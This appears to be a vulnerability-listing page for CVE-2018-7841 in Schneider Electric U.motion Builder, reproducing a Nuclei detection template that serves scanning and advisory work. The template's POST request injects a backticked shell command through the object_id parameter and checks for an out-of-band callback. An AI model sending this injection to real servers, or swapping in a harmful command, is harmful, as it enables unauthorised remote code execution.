CVE-2018-7841: Schneider Electric U.motion Builder - Remote Code Execution

日期: 2025-08-01 | 影响软件: Schneider Electric U.motion Builder | POC: 已公开

漏洞描述

U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.

PoC代码[已公开]

id: CVE-2018-7841

info:
  name: Schneider Electric U.motion Builder - Remote Code Execution
  author: darses,rcesecurity
  severity: critical
  description: |
    U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.
  impact: |
    Attackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network.
  remediation: |
    The product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems.
  reference:
    - https://www.exploit-db.com/exploits/46846
    - https://packetstorm.news/files/id/152862
    - https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day
    - https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2017-178-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2019-071-02-Umotion-Builder.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7841
    cwe-id: CWE-78
    epss-score: 0.59135
    epss-percentile: 0.98175
    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:1.3.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-requests: 1
    vendor: schneider-electric
    product: u.motion_builder
    shodan-query: http.headers_hash:1985490094
  tags: cve,cve2018,schneider-electric,rce,kev,oast,oob

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=`ping -c 1 {{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 490a0046304402200fac36987e734ae7d3bc98ff8bb279ed9ab3226ae2a39720a764d1c6354bacf5022018176ef0be095c31d96aea40acd411d40699fc1e8ed0360be22de2d84c78e827:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7841.yaml